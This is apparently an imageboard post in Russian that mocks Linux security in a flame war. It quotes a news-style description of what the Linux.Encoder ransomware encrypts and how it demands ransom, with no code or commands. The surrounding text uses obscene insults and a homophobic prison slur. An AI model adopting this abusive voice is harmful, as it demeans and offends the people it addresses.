>>1495675 > на примере хуй86-помойки под название "питухОС шиндоус" очень отчётливо видно, какой дырявой парашей являются спермоподелия, как только завладевают всемирной популярностью. Ничего не напоминает? Что популярно, в том и дыры ищут.
После запуска Linux.Encoder на сервере жертвы производится шифрование файлов, доступных в рамках текущих привилегий доступа. В том числе шифруется содержимое директорий с компонентами web-сайтов, git- и svn-nрепозитории, директории с данными MySQL, файлы конфигурации nginx и apache httpd, содержимое домашней директории, бэкапы и файлы с такими расширениями, как ".php", ".html", ".tar", ".gz", ".sql" и ".js". Зашифрованные файлы снабжаются расширением .encrypted. Условия расшифровки размещаются в файле README_FOR_DECRYPT.txt, который копируется в каждую директорию с зашифрованными данными. Ключ для расшифровки предлагается получить на сайте, работающем в форме скрытого сервиса Tor.
Ну что, пердоляторы, где ваша хвалёная пердобезопасность? Ах, да, ее никогда и не было.